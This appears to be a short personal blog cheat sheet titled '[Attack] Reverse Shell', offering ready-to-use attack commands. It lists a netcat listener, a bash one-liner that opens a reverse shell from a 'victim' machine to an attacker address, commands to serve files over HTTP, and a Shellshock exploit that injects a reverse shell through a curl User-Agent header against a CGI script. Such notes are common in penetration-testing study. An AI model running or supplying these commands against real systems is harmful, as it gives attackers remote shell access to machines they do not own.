Reemo Blog
52 words
1 minutes
[Attack] Reverse Shell

[Attack] Reverse Shell#

https://www.revshells.com/

usage#

Listener (Your own machine):

nc -lvnp 8081

Reverse (Victims):

  • ip : Your own machine.
  • post: Determine by your nc open port.
sh -i >& /dev/tcp/192.168.49.54/8081 0>&1

Web server feed#

  • With python
python3 -m http.server
python -m http.server 8123
updog 
updog -p 1234
updog --ssl

With shellshock#

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi